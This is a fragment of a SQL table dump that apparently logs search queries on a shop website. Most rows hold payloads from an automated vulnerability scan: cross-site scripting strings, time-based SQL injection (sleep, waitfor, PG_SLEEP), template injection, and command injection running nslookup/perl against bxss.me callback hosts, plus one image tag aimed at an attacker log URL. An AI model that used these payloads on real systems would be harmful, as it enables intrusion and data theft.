03:17:32'),(727,'HttP://bxss.me/t/xss.html?%00',16,18,NULL,9,1,1,0,'2021-10-31 22:54:43'),(729,'!(()&&!|*|*|',0,19,NULL,9,1,1,0,'2021-10-31 22:54:34'),(731,'\".gethostbyname(lc(\"hitog\".\"qitogcxp5dbdf.bxss.me.\")).\"A\".chr(67).chr(hex(\"58\")).chr(120).chr(79).chr(116).chr(85).\"',0,1,NULL,9,1,1,0,'2021-10-30 18:54:37'),(733,'Http://bxss.me/t/fit.txt',16,18,NULL,9,1,1,0,'2021-10-31 22:54:37'),(735,'|(nslookup hitcnmspmaiehe22aa.bxss.me||perl -e \"gethostbyname(\'hitcnmspmaiehe22aa.bxss.me\')\")',0,1,NULL,9,1,1,0,'2021-10-30 18:54:39'),(737,'\';print(md5(31337));$a=\'',2,18,NULL,9,1,1,0,'2021-10-31 22:54:51'),(739,'\"+\"A\".concat(70-3).concat(22*4).concat(119).concat(76).concat(105).concat(81)+(require\"socket\"\nSocket.gethostbyname(\"hitbr\"+\"icz',0,1,NULL,9,1,1,0,'2021-10-30 18:54:46'),(741,'bxss.me/t/xss.html?%00',16,18,NULL,9,1,1,0,'2021-10-31 22:54:53'),(743,'^(#$!@#$)(()))******',0,19,NULL,9,1,1,0,'2021-10-31 22:54:41'),(745,'index.php',0,38,NULL,9,1,1,0,'2021-10-31 22:55:07'),(747,'http://bxss.me/t/fit.txt?.jpg',16,18,NULL,9,1,1,0,'2021-10-31 22:54:45'),(749,'`(nslookup hitqizgruoelqd8b7b.bxss.me||perl -e \"gethostbyname(\'hitqizgruoelqd8b7b.bxss.me\')\")`',0,1,NULL,9,1,1,0,'2021-10-30 18:55:09'),(751,'WywWjCQj',0,1,NULL,9,1,1,0,'2021-10-30 18:55:10'),(753,'\";print(md5(31337));$a=\"',0,19,NULL,9,1,1,0,'2021-10-31 22:54:59'),(755,'\'+\'A\'.concat(70-3).concat(22*4).concat(112).concat(70).concat(121).concat(66)+(require\'socket\'\nSocket.gethostbyname(\'hitxi\'+\'ruc',29,1,NULL,9,1,1,0,'2021-10-30 18:55:14'),(757,')))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))',0,19,NULL,9,1,1,0,'2021-10-31 22:55:00'),(761,'/xfs.bxss.me',0,19,NULL,9,1,1,0,'2021-10-31 22:55:03'),(763,'bxss.me',0,19,NULL,9,1,1,0,'2021-10-31 22:54:51'),(765,';(nslookup hiteebcvfsvjmf1bde.bxss.me||perl -e \"gethostbyname(\'hiteebcvfsvjmf1bde.bxss.me\')\")|(nslookup hiteebcvfsvjmf1bde.bxss.',0,1,NULL,9,1,1,0,'2021-10-30 18:55:22'),(767,'test\' AND 2*3*8=6*8 AND \'hZmI\'=\'hZmI',36,1,NULL,9,1,1,0,'2021-10-30 18:55:24'),(769,'${@print(md5(31337))}',0,19,NULL,9,1,1,0,'2021-10-31 22:55:08'),(771,'\'\"',0,0,NULL,9,1,1,0,'2021-10-30 18:55:27'),(772,'test\'\"()&%<acx><ScRiPt >NexG(9561)</ScRiPt>',0,1,NULL,9,1,1,0,'2021-10-30 18:55:27'),(774,'index.php/.',0,19,NULL,9,1,1,0,'2021-10-31 22:55:15'),(776,'997001',0,1,NULL,9,1,1,0,'2021-10-30 18:55:29'),(778,'test\" AND 2*3*8=6*8 AND \"mRFP\"=\"mRFP',36,1,NULL,9,1,1,0,'2021-10-30 18:55:32'),(780,'${@print(md5(31337))}\\',0,19,NULL,9,1,1,0,'2021-10-31 22:55:16'),(782,'<!--',0,19,NULL,9,1,1,0,'2021-10-31 22:55:19'),(784,'\'\"()&%<acx><ScRiPt >NexG(9671)</ScRiPt>',0,1,NULL,9,1,1,0,'2021-10-30 18:55:34'),(786,'http://xfs.bxss.me',0,19,NULL,9,1,1,0,'2021-10-31 22:55:17'),(788,'test%\' AND 2*3*8=6*8 AND \'yJNt\'!=\'yJNt%',36,1,NULL,9,1,1,0,'2021-10-30 18:55:39'),(790,'\'.print(md5(31337)).\'',0,19,NULL,9,1,1,0,'2021-10-31 22:55:25'),(792,'test9895937',0,1,NULL,9,1,1,0,'2021-10-30 18:55:42'),(794,'//xfs.bxss.me',0,19,NULL,9,1,1,0,'2021-10-31 22:55:24'),(796,'-1 OR 2+787-787-1=0+0+0+1',19,1,NULL,9,1,1,0,'2021-10-30 18:55:47'),(798,'/\\xfs.bxss.me',0,19,NULL,9,1,1,0,'2021-10-31 22:55:29'),(800,'test9895937<',0,1,NULL,9,1,1,0,'2021-10-30 18:55:50'),(802,'-1 OR 3+787-787-1=0+0+0+1',26,1,NULL,9,1,1,0,'2021-10-30 18:55:55'),(804,'acu1798＜s1﹥s2ʺs3ʹuca1798',0,1,NULL,9,1,1,0,'2021-10-30 18:55:57'),(806,'-1 OR 3*2<(0+5+787-787)',48,1,NULL,9,1,1,0,'2021-10-30 18:56:05'),(808,'acux2714??z1??z2a?bcxuca2714',0,1,NULL,9,1,1,0,'2021-10-30 18:56:05'),(810,'<%={{={@{#{${acx}}%>',0,53,NULL,9,1,1,0,'2021-10-31 22:59:46'),(812,'-1 OR 3*2>(0+5+787-787)',48,1,NULL,9,1,1,0,'2021-10-30 18:56:14'),(814,'<th:t=\"${acx}#foreach',16,40,NULL,9,1,1,0,'2021-10-31 22:59:53'),(816,'test\'||\'',0,2,NULL,9,1,1,0,'2021-10-31 03:21:53'),(820,'test\'|||\'',0,1,NULL,9,1,1,0,'2021-10-30 18:56:30'),(822,'1}}\"}}\'}}1%>\"%>\'%><%={{={@{#{${acx}}%>',9,40,NULL,9,1,1,0,'2021-10-31 23:00:08'),(824,'1\'\"',74,18,NULL,9,1,1,0,'2021-10-31 23:18:49'),(828,'1\0????%2527%2522',9,18,NULL,9,1,1,0,'2021-10-31 23:18:53'),(830,'acx{{98991*97996}}xca',0,53,NULL,9,1,1,0,'2021-10-31 23:00:20'),(832,'@@3EWY5',0,1,NULL,9,1,1,0,'2021-10-30 18:56:54'),(834,'acx[[${98991*97996}]]xca',0,53,NULL,9,1,1,0,'2021-10-31 23:00:26'),(836,'acx__${98991*97996}__::.x',2,40,NULL,9,1,1,0,'2021-10-31 23:00:31'),(838,'\"acxzzzzzzzzbbbccccdddeeexca\".replace(\"z\",\"o\")',0,53,NULL,9,1,1,0,'2021-10-31 23:00:36'),(840,'acu7261＜s1﹥s2ʺs3ʹuca7261',0,1,NULL,9,1,1,0,'2021-10-30 18:57:21'),(842,'acux8731??z1??z2a?bcxuca8731',0,1,NULL,9,1,1,0,'2021-10-30 18:57:29'),(859,'acu1516＜s1﹥s2ʺs3ʹuca1516',0,1,NULL,9,1,1,0,'2021-10-30 18:58:57'),(861,'acux3389??z1??z2a?bcxuca3389',0,1,NULL,9,1,1,0,'2021-10-30 18:59:08'),(878,'acu4602＜s1﹥s2ʺs3ʹuca4602',0,1,NULL,9,1,1,0,'2021-10-30 19:01:01'),(880,'acux1834??z1??z2a?bcxuca1834',0,1,NULL,9,1,1,0,'2021-10-30 19:01:12'),(897,'acu4121＜s1﹥s2ʺs3ʹuca4121',0,1,NULL,9,1,1,0,'2021-10-30 19:02:48'),(899,'acux4773??z1??z2a?bcxuca4773',0,1,NULL,9,1,1,0,'2021-10-30 19:02:58'),(916,'acu10774＜s1﹥s2ʺs3ʹuca10774',0,1,NULL,9,1,1,0,'2021-10-30 19:04:32'),(918,'acux9965??z1??z2a?bcxuca9965',0,1,NULL,9,1,1,0,'2021-10-30 19:04:40'),(935,'acu8316＜s1﹥s2ʺs3ʹuca8316',0,1,NULL,9,1,1,0,'2021-10-30 19:06:10'),(937,'acux9261??z1??z2a?bcxuca9261',0,1,NULL,9,1,1,0,'2021-10-30 19:06:20'),(954,'test\"onmouseover=NexG(99352)\"',0,1,NULL,9,1,1,0,'2021-10-30 19:07:48'),(956,'test\" 3sLe=NexG([!+!]) XFv=\"',0,1,NULL,9,1,1,0,'2021-10-30 19:07:57'),(958,'test\\u0022onmouseover=NexG(98993)\\u0022',0,1,NULL,9,1,1,0,'2021-10-30 19:08:07'),(960,'%74%65%73%74%22%6F%6E%6D%6F%75%73%65%6F%76%65%72%3D%4E%65%78%47%28%39%38%30%39%34%29%22',20,1,NULL,9,1,1,0,'2021-10-30 19:08:17'),(962,'?\"onmouseover=NexG(91485)//',0,1,NULL,9,1,1,0,'2021-10-30 19:08:26'),(964,'test\"sTYLe=\'acu:Expre/**/SSion(NexG(9850))\'bad=\"',0,1,NULL,9,1,1,0,'2021-10-30 19:08:35'),(966,'test\"><script>NexG(9781)</script>',0,1,NULL,9,1,1,0,'2021-10-30 19:08:43'),(968,'test</title><ScRiPt >NexG(9446)</ScRiPt>',0,1,NULL,9,1,1,0,'2021-10-30 19:08:52'),(970,'test<ScRiPt >NexG(9245)</ScRiPt>',0,1,NULL,9,1,1,0,'2021-10-30 19:09:01'),(972,'test<WWPTFQ>EAU1I[!+!]</WWPTFQ>',0,1,NULL,9,1,1,0,'2021-10-30 19:09:11'),(974,'test<script>NexG(9564)</script>',0,1,NULL,9,1,1,0,'2021-10-30 19:09:20'),(976,'test<ScR<ScRiPt>IpT>NexG(9856)</sCr<ScRiPt>IpT>',0,1,NULL,9,1,1,0,'2021-10-30 19:09:28'),(978,'test<ScRiPt \r\n>NexG(9611)</ScRiPt>',0,1,NULL,9,1,1,0,'2021-10-30 19:09:37'),(980,'test<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9535></ScRiPt>',16,1,NULL,9,1,1,0,'2021-10-30 19:09:46'),(982,'test<\0ScRiPt \r\n>NexG(9124)</ScRiPt>',0,1,NULL,9,1,1,0,'2021-10-30 19:09:55'),(984,'test<svg	\n\r?\0onload=NexG(9599);>',0,1,NULL,9,1,1,0,'2021-10-30 19:10:04'),(986,'test<isindex type=image src=1 onerror=NexG(9630)>',0,1,NULL,9,1,1,0,'2021-10-30 19:10:13'),(988,'test<iframe src=\'data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=\' invalid=\'9433\'>',0,1,NULL,9,1,1,0,'2021-10-30 19:10:22'),(990,'test<body onload=NexG(9370)>',0,1,NULL,9,1,1,0,'2021-10-30 19:10:31'),(992,'test<img src=//xss.bxss.me/t/dot.gif onload=NexG(9742)>',0,1,NULL,9,1,1,0,'2021-10-30 19:10:41'),(994,'test<img src=xyz OnErRor=NexG(9453)>',0,1,NULL,9,1,1,0,'2021-10-30 19:10:50'),(996,'test<img/src=\">\" onerror=alert(9252)>',0,1,NULL,9,1,1,0,'2021-10-30 19:11:00'),(998,'%74%65%73%74%3C%53%63%52%69%50%74%20%3E%4E%65%78%47%289963%29%3C%2F%73%43%72%69%70%54%3E',9,1,NULL,9,1,1,0,'2021-10-30 19:11:10'),(1000,'test\\u003CScRiPt\\NexG(9884)\\u003C/sCripT\\u003E',0,1,NULL,9,1,1,0,'2021-10-30 19:11:20'),(1002,'test&lt;ScRiPt&gt;NexG(9186)&lt;/sCripT&gt;',0,1,NULL,9,1,1,0,'2021-10-30 19:11:29'),(1004,'?<img acu onmouseover=NexG(94151) //?>',0,1,NULL,9,1,1,0,'2021-10-30 19:11:37'),(1006,'test<input autofocus onfocus=NexG(9391)>',0,1,NULL,9,1,1,0,'2021-10-30 19:11:46'),(1008,'<a HrEF=http://xss.bxss.me></a>',12,6,NULL,9,1,1,0,'2021-10-31 23:03:33'),(1010,'<a HrEF=jaVaScRiPT:>',0,7,NULL,9,1,1,0,'2021-10-31 23:03:39'),(1012,'test}body{acu:Expre/**/SSion(NexG(9551))}',0,1,NULL,9,1,1,0,'2021-10-30 19:12:11'),(1014,'testXC3Pp\n<ScRiPt >NexG(9799)</ScRiPt>',0,1,NULL,9,1,1,0,'2021-10-30 19:12:20'),(1016,'test<WOQQSZ>BXPDE[!+!]</WOQQSZ>',0,1,NULL,9,1,1,0,'2021-10-30 19:12:28'),(1018,'test<ifRAme sRc=9930.com></IfRamE>',0,1,NULL,9,1,1,0,'2021-10-30 19:12:36'),(1020,'test<aboWvws x=9756>',0,1,NULL,9,1,1,0,'2021-10-30 19:12:44'),(1022,'test<img sRc=\'http://attacker-9029/log.php?',0,1,NULL,9,1,1,0,'2021-10-30 19:12:50'),(1024,'test<aCt1IBx<',0,1,NULL,9,1,1,0,'2021-10-30 19:12:58'),(1026,'test9130\"();}]9305',0,1,NULL,9,1,1,0,'2021-10-30 19:13:08'),(1028,'%74%65%73%74%39%39%31%30%22%28%29%3B%7D%5D%39%36%37%36',8,1,NULL,9,1,1,0,'2021-10-30 19:13:17'),(1030,'test</script><script>NexG(9890)</script>',0,1,NULL,9,1,1,0,'2021-10-30 19:13:25'),(1032,'JJJ11QQQ',0,3,NULL,9,1,1,0,'2021-10-31 10:02:17'),(1040,'*:*&fl=*,id:[value%20v=\'\\u0036\\u0036\\u003699431917\\u0039\\u0039\\u0039\'],name:[value%20v=\'\\u0036\\u0036\\u003699431917\\u0039\\u0039\\u',10,1,NULL,9,1,1,0,'2021-10-31 03:17:12'),(1042,'19YcNrA4SO',0,1,NULL,9,1,1,0,'2021-10-31 03:17:13'),(1044,'response.write(9958426*9213175)',0,1,NULL,9,1,1,0,'2021-10-31 03:17:13'),(1046,'echo qarhqw$()\\ leumcf\\nz^xyu||a #\' &echo qarhqw$()\\ leumcf\\nz^xyu||a #|\" &echo qarhqw$()\\ leumcf\\nz^xyu||a #',2,1,NULL,9,1,1,0,'2021-10-31 03:17:15'),(1048,'zgRSDyQU',0,1,NULL,9,1,1,0,'2021-10-31 03:17:15'),(1050,'aaa&shards=http://hitsfgazgfqixd5d2f.bxss.me/solr',0,1,NULL,9,1,1,0,'2021-10-31 03:17:16'),(1054,'\'+response.write(9958426*9213175)+\'',0,1,NULL,9,1,1,0,'2021-10-31 03:17:20'),(1056,'&echo nwzint$()\\ nffcce\\nz^xyu||a #\' &echo nwzint$()\\ nffcce\\nz^xyu||a #|\" &echo nwzint$()\\ nffcce\\nz^xyu||a #',2,1,NULL,9,1,1,0,'2021-10-31 03:17:22'),(1060,'\"+response.write(9958426*9213175)+\"',0,1,NULL,9,1,1,0,'2021-10-31 03:17:23'),(1064,'|echo oekbve$()\\ tscras\\nz^xyu||a #\' |echo oekbve$()\\ tscras\\nz^xyu||a #|\" |echo oekbve$()\\ tscras\\nz^xyu||a #',2,1,NULL,9,1,1,0,'2021-10-31 03:17:26'),(1068,'${9999809+9999632}',0,1,NULL,9,1,1,0,'2021-10-31 03:17:28'),(1070,'(nslookup hitacziwhbrvqd8c04.bxss.me||perl -e \"gethostbyname(\'hitacziwhbrvqd8c04.bxss.me\')\")',0,1,NULL,9,1,1,0,'2021-10-31 03:17:29'),(1076,'test&n990220=v902337',0,1,NULL,9,1,1,0,'2021-10-31 03:17:34'),(1078,'$(nslookup hitgemjvrvudy54333.bxss.me||perl -e \"gethostbyname(\'hitgemjvrvudy54333.bxss.me\')\")',0,1,NULL,9,1,1,0,'2021-10-31 03:17:35'),(1080,'./test',0,1,NULL,9,1,1,0,'2021-10-31 03:17:36'),(1084,'&(nslookup hitplfccodqiy8ae94.bxss.me||perl -e \"gethostbyname(\'hitplfccodqiy8ae94.bxss.me\')\")&\'\\\"`0&(nslookup hitplfccodqiy8ae94',0,1,NULL,9,1,1,0,'2021-10-31 03:17:40'),(1089,'\'.gethostbyname(lc(\'hityi\'.\'siizapjpd9259.bxss.me.\')).\'A\'.chr(67).chr(hex(\'58\')).chr(121).chr(81).chr(109).chr(86).\'',3,1,NULL,9,1,1,0,'2021-10-31 03:17:42'),(1093,'|(nslookup hitmotjayaydxee55a.bxss.me||perl -e \"gethostbyname(\'hitmotjayaydxee55a.bxss.me\')\")',0,1,NULL,9,1,1,0,'2021-10-31 03:17:44'),(1098,'\".gethostbyname(lc(\"hitag\".\"dfmljnxl71765.bxss.me.\")).\"A\".chr(67).chr(hex(\"58\")).chr(116).chr(84).chr(99).chr(87).\"',0,1,NULL,9,1,1,0,'2021-10-31 03:17:48'),(1100,'`(nslookup hithsagbablfeaaedd.bxss.me||perl -e \"gethostbyname(\'hithsagbablfeaaedd.bxss.me\')\")`',0,1,NULL,9,1,1,0,'2021-10-31 03:17:50'),(1107,'\"+\"A\".concat(70-3).concat(22*4).concat(102).concat(77).concat(110).concat(84)+(require\"socket\"\nSocket.gethostbyname(\"hitlx\"+\"nku',0,1,NULL,9,1,1,0,'2021-10-31 03:17:54'),(1109,';(nslookup hitwdtjlatjsb5c83c.bxss.me||perl -e \"gethostbyname(\'hitwdtjlatjsb5c83c.bxss.me\')\")|(nslookup hitwdtjlatjsb5c83c.bxss.',0,1,NULL,9,1,1,0,'2021-10-31 03:17:55'),(1114,'\'+\'A\'.concat(70-3).concat(22*4).concat(120).concat(68).concat(122).concat(68)+(require\'socket\'\nSocket.gethostbyname(\'hitox\'+\'wyp',30,1,NULL,9,1,1,0,'2021-10-31 03:17:59'),(1125,'test\'\"()&%<acx><ScRiPt >Lwjb(9965)</ScRiPt>',0,1,NULL,9,1,1,0,'2021-10-31 03:18:05'),(1129,'984784',0,1,NULL,9,1,1,0,'2021-10-31 03:18:07'),(1133,'\'\"()&%<acx><ScRiPt >Lwjb(9567)</ScRiPt>',0,1,NULL,9,1,1,0,'2021-10-31 03:18:09'),(1143,'test9083051',0,1,NULL,9,1,1,0,'2021-10-31 03:18:13'),(1149,'test9083051<',0,1,NULL,9,1,1,0,'2021-10-31 03:18:17'),(1153,'acu4679＜s1﹥s2ʺs3ʹuca4679',0,1,NULL,9,1,1,0,'2021-10-31 03:18:24'),(1155,'acux3463??z1??z2a?bcxuca3463',0,1,NULL,9,1,1,0,'2021-10-31 03:18:28'),(1174,'acu8707＜s1﹥s2ʺs3ʹuca8707',0,1,NULL,9,1,1,0,'2021-10-31 03:19:14'),(1176,'acux2533??z1??z2a?bcxuca2533',0,1,NULL,9,1,1,0,'2021-10-31 03:19:17'),(1193,'acu6413＜s1﹥s2ʺs3ʹuca6413',0,1,NULL,9,1,1,0,'2021-10-31 03:19:50'),(1195,'acux6325??z1??z2a?bcxuca6325',0,1,NULL,9,1,1,0,'2021-10-31 03:19:53'),(1214,'acu9739＜s1﹥s2ʺs3ʹuca9739',0,1,NULL,9,1,1,0,'2021-10-31 03:20:25'),(1216,'acux9980??z1??z2a?bcxuca9980',0,1,NULL,9,1,1,0,'2021-10-31 03:20:28'),(1233,'acu7166＜s1﹥s2ʺs3ʹuca7166',0,1,NULL,9,1,1,0,'2021-10-31 03:21:03'),(1235,'acux2921??z1??z2a?bcxuca2921',0,1,NULL,9,1,1,0,'2021-10-31 03:21:09'),(1239,'HayyBsuz',0,1,NULL,9,1,1,0,'2021-10-31 03:21:17'),(1242,'test\' AND 2*3*8=6*8 AND \'P5vT\'=\'P5vT',36,1,NULL,9,1,1,0,'2021-10-31 03:21:22'),(1246,'test\" AND 2*3*8=6*8 AND \"eyfS\"=\"eyfS',36,1,NULL,9,1,1,0,'2021-10-31 03:21:26'),(1249,'test%\' AND 2*3*8=6*8 AND \'dqAX\'!=\'dqAX%',36,1,NULL,9,1,1,0,'2021-10-31 03:21:32'),(1253,'-1 OR 2+814-814-1=0+0+0+1',19,1,NULL,9,1,1,0,'2021-10-31 03:21:36'),(1257,'-1 OR 3+814-814-1=0+0+0+1',26,1,NULL,9,1,1,0,'2021-10-31 03:21:39'),(1261,'-1 OR 3*2<(0+5+814-814)',48,1,NULL,9,1,1,0,'2021-10-31 03:21:44'),(1264,'-1 OR 3*2>(0+5+814-814)',48,1,NULL,9,1,1,0,'2021-10-31 03:21:47'),(1270,'acu4404＜s1﹥s2ʺs3ʹuca4404',0,1,NULL,9,1,1,0,'2021-10-31 03:21:55'),(1272,'acux2798??z1??z2a?bcxuca2798',0,1,NULL,9,1,1,0,'2021-10-31 03:21:58'),(1289,'acu5186＜s1﹥s2ʺs3ʹuca5186',0,1,NULL,9,1,1,0,'2021-10-31 03:22:46'),(1291,'acux7904??z1??z2a?bcxuca7904',0,1,NULL,9,1,1,0,'2021-10-31 03:22:50'),(1306,'if(now()=sysdate(),sleep(15),0)',2,17,NULL,9,1,1,0,'2021-10-31 23:02:26'),(1310,'test\"onmouseover=Lwjb(90752)\"',0,1,NULL,9,1,1,0,'2021-10-31 03:23:28'),(1312,'test\" tOpE=Lwjb([!+!]) jC9=\"',0,1,NULL,9,1,1,0,'2021-10-31 03:23:32'),(1314,'test\\u0022onmouseover=Lwjb(93903)\\u0022',0,1,NULL,9,1,1,0,'2021-10-31 03:23:36'),(1316,'%74%65%73%74%22%6F%6E%6D%6F%75%73%65%6F%76%65%72%3D%4C%77%6A%62%28%39%32%35%39%34%29%22',19,1,NULL,9,1,1,0,'2021-10-31 03:23:38'),(1318,'?\"onmouseover=Lwjb(94765)//',0,1,NULL,9,1,1,0,'2021-10-31 03:23:43'),(1320,'test\"sTYLe=\'acu:Expre/**/SSion(Lwjb(9199))\'bad=\"',0,1,NULL,9,1,1,0,'2021-10-31 03:23:49'),(1322,'test\"><script>Lwjb(9141)</script>',0,1,NULL,9,1,1,0,'2021-10-31 03:23:53'),(1324,'test</title><ScRiPt >Lwjb(9604)</ScRiPt>',0,1,NULL,9,1,1,0,'2021-10-31 03:23:56'),(1326,'test<ScRiPt >Lwjb(9520)</ScRiPt>',0,1,NULL,9,1,1,0,'2021-10-31 03:24:00'),(1328,'test<WJZKVF>B74LI[!+!]</WJZKVF>',0,1,NULL,9,1,1,0,'2021-10-31 03:24:06'),(1330,'test<script>Lwjb(9576)</script>',0,1,NULL,9,1,1,0,'2021-10-31 03:24:10'),(1332,'test<ScR<ScRiPt>IpT>Lwjb(9908)</sCr<ScRiPt>IpT>',0,1,NULL,9,1,1,0,'2021-10-31 03:24:16'),(1334,'test<ScRiPt \r\n>Lwjb(9708)</ScRiPt>',0,1,NULL,9,1,1,0,'2021-10-31 03:24:21'),(1336,'test<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9824></ScRiPt>',16,1,NULL,9,1,1,0,'2021-10-31 03:24:28'),(1338,'test<\0ScRiPt \r\n>Lwjb(9297)</ScRiPt>',0,1,NULL,9,1,1,0,'2021-10-31 03:24:31'),(1340,'test<svg	\n\r?\0onload=Lwjb(9988);>',0,1,NULL,9,1,1,0,'2021-10-31 03:24:36'),(1342,'test<isindex type=image src=1 onerror=Lwjb(9318)>',0,1,NULL,9,1,1,0,'2021-10-31 03:24:39'),(1344,'test<iframe src=\'data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=\' invalid=\'9803\'>',0,1,NULL,9,1,1,0,'2021-10-31 03:24:43'),(1346,'test<body onload=Lwjb(9237)>',0,1,NULL,9,1,1,0,'2021-10-31 03:24:48'),(1348,'0\'XOR(if(now()=sysdate(),sleep(15),0))XOR\'Z',2,17,NULL,9,1,1,0,'2021-10-31 23:04:40'),(1350,'test<img src=//xss.bxss.me/t/dot.gif onload=Lwjb(9963)>',0,1,NULL,9,1,1,0,'2021-10-31 03:24:52'),(1352,'test<img src=xyz OnErRor=Lwjb(9228)>',0,1,NULL,9,1,1,0,'2021-10-31 03:24:58'),(1354,'test<img/src=\">\" onerror=alert(9497)>',0,1,NULL,9,1,1,0,'2021-10-31 03:25:09'),(1356,'%74%65%73%74%3C%53%63%52%69%50%74%20%3E%4C%77%6A%62%289833%29%3C%2F%73%43%72%69%70%54%3E',11,1,NULL,9,1,1,0,'2021-10-31 03:25:22'),(1358,'test\\u003CScRiPt\\Lwjb(9206)\\u003C/sCripT\\u003E',0,1,NULL,9,1,1,0,'2021-10-31 03:25:27'),(1360,'test&lt;ScRiPt&gt;Lwjb(9060)&lt;/sCripT&gt;',0,1,NULL,9,1,1,0,'2021-10-31 03:25:31'),(1362,'?<img acu onmouseover=Lwjb(95511) //?>',0,1,NULL,9,1,1,0,'2021-10-31 03:25:35'),(1364,'test<input autofocus onfocus=Lwjb(9663)>',0,1,NULL,9,1,1,0,'2021-10-31 03:25:40'),(1369,'test}body{acu:Expre/**/SSion(Lwjb(9753))}',0,1,NULL,9,1,1,0,'2021-10-31 03:25:52'),(1371,'teste359T\n<ScRiPt >Lwjb(9784)</ScRiPt>',0,1,NULL,9,1,1,0,'2021-10-31 03:25:56'),(1373,'test<WBSXHN>PZBAC[!+!]</WBSXHN>',0,1,NULL,9,1,1,0,'2021-10-31 03:25:59'),(1375,'test<ifRAme sRc=9912.com></IfRamE>',0,1,NULL,9,1,1,0,'2021-10-31 03:26:04'),(1377,'test<auimfe7 x=9611>',0,1,NULL,9,1,1,0,'2021-10-31 03:26:08'),(1379,'test<img sRc=\'http://attacker-9524/log.php?',0,1,NULL,9,1,1,0,'2021-10-31 03:26:13'),(1381,'test<aDXPjA1<',0,1,NULL,9,1,1,0,'2021-10-31 03:26:17'),(1383,'test9194\"();}]9383',0,1,NULL,9,1,1,0,'2021-10-31 03:26:21'),(1385,'%74%65%73%74%39%34%31%37%22%28%29%3B%7D%5D%39%33%34%39',4,1,NULL,9,1,1,0,'2021-10-31 03:26:26'),(1387,'test</script><script>Lwjb(9809)</script>',0,1,NULL,9,1,1,0,'2021-10-31 03:26:29'),(1389,'0\"XOR(if(now()=sysdate(),sleep(15),0))XOR\"Z',2,17,NULL,9,1,1,0,'2021-10-31 23:06:00'),(1391,'(select(0)from(select(sleep(15)))v)/*\'+(select(0)from(select(sleep(15)))v)+\'\"+(select(0)from(select(sleep(15)))v)+\"*/',11,17,NULL,9,1,1,0,'2021-10-31 23:07:50'),(1393,'1 waitfor delay \'0:0:15\' --',11,17,NULL,9,1,1,0,'2021-10-31 23:09:06'),(1395,'bp6DD3xw\'; waitfor delay \'0:0:15\' --',2,1,NULL,9,1,1,0,'2021-10-31 03:30:44'),(1397,'wXlfxG5P\' OR 479=(SELECT 479 FROM PG_SLEEP(15))--',2,1,NULL,9,1,1,0,'2021-10-31 03:32:31'),(1399,'cQanUVSC\') OR 78=(SELECT 78 FROM PG_SLEEP(15))--',2,1,NULL,9,1,1,0,'2021-10-31 03:33:51'),(1401,'Zib2x6lS\')) OR 621=(SELECT 621 FROM PG_SLEEP(15))--',2,1,NULL,9,1,1,0,'2021-10-31 03:35:01'),(1403,'test\'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||\'',4,1,NULL,9,1,1,0,'2021-10-31 03:36:11'),(1407,'@@gToSO',0,1,NULL,9,1,1,0,'2021-10-31 03:36:22'),(1409,'1',0,0,NULL,9,1,1,0,'2021-10-31 05:14:44'),(1410,'thất',2,4475,'https://store.flexfit.vn/',9,1,1,0,'2021-12-24 06:42:09'),(1424,'*:*&fl=*,id:[value%20v=\'\\u0036\\u0036\\u003692150643\\u0039\\u0039\\u0039\'],name:[value%20v=\'\\u0036\\u0036\\u003692150643\\u0039\\u0039\\u',10,1,NULL,9,1,1,0,'2021-10-31 10:04:18'),(1430,'aaa&shards=http://hitqwcdohaqcie64d6.bxss.me/solr',0,1,NULL,9,1,1,0,'2021-10-31 10:04:22'),(1440,'005u5nBD',0,1,NULL,9,1,1,0,'2021-10-31 10:04:29'),(1448,'response.write(9012512*9855011)',0,1,NULL,9,1,1,0,'2021-10-31 10:04:34'),(1454,'\'+response.write(9012512*9855011)+\'',0,1,NULL,9,1,1,0,'2021-10-31 10:04:39'),(1460,'\"+response.write(9012512*9855011)+\"',0,1,NULL,9,1,1,0,'2021-10-31 10:04:44'),(1484,'echo ovpnaj$()\\ lcpvxa\\nz^xyu||a #\' &echo ovpnaj$()\\ lcpvxa\\nz^xyu||a #|\" &echo ovpnaj$()\\ lcpvxa\\nz^xyu||a #',2,1,NULL,9,1,1,0,'2021-10-31 10:04:58'),(1486,'../thất',2,17,NULL,9,1,1,0,'2021-10-31 22:54:29'),(1488,'thất<esi:include src=\"http://bxss.me/rpb.png\"/>',2,17,NULL,9,1,1,0,'2021-10-31 22:54:14'),(1492,'&echo jslsag$()\\ qbjmra\\nz^xyu||a #\' &echo jslsag$()\\ qbjmra\\nz^xyu||a #|\" &echo jslsag$()\\ qbjmra\\nz^xyu||a #',2,1,NULL,9,1,1,0,'2021-10-31 10:05:01'),(1500,'${9999434+9999384}',0,1,NULL,9,1,1,0,'2021-10-31 10:05:06'),(1502,'|echo deoqex$()\\ nzgyvd\\nz^xyu||a #\' |echo deoqex$()\\ nzgyvd\\nz^xyu||a #|\" |echo deoqex$()\\ nzgyvd\\nz^xyu||a #',2,1,NULL,9,1,1,0,'2021-10-31 10:05:07'),(1506,'thất&n955741=v968199',2,1,NULL,9,1,1,0,'2021-10-31 10:05:10'),(1510,'(nslookup hitssbhqmdtnacdcac.bxss.me||perl -e \"gethostbyname(\'hitssbhqmdtnacdcac.bxss.me\')\")',0,1,NULL,9,1,1,0,'2021-10-31 10:05:11'),(1518,'$(nslookup hitewvywmzhcve5176.bxss.me||perl -e \"gethostbyname(\'hitewvywmzhcve5176.bxss.me\')\")',0,1,NULL,9,1,1,0,'2021-10-31 10:05:15'),(1526,'&(nslookup hitzxllfllxny0d015.bxss.me||perl -e \"gethostbyname(\'hitzxllfllxny0d015.bxss.me\')\")&\'\\\"`0&(nslookup hitzxllfllxny0d015',0,1,NULL,9,1,1,0,'2021-10-31 10:05:20'),(1531,'\'.gethostbyname(lc(\'hitpj\'.\'avkkyilz52ea9.bxss.me.\')).\'A\'.chr(67).chr(hex(\'58\')).chr(116).chr(84).chr(114).chr(85).\'',6,1,NULL,9,1,1,0,'2021-10-31 10:05:22'),(1535,'|(nslookup hitaezjybynupad0a1.bxss.me||perl -e \"gethostbyname(\'hitaezjybynupad0a1.bxss.me\')\")',0,1,NULL,9,1,1,0,'2021-10-31 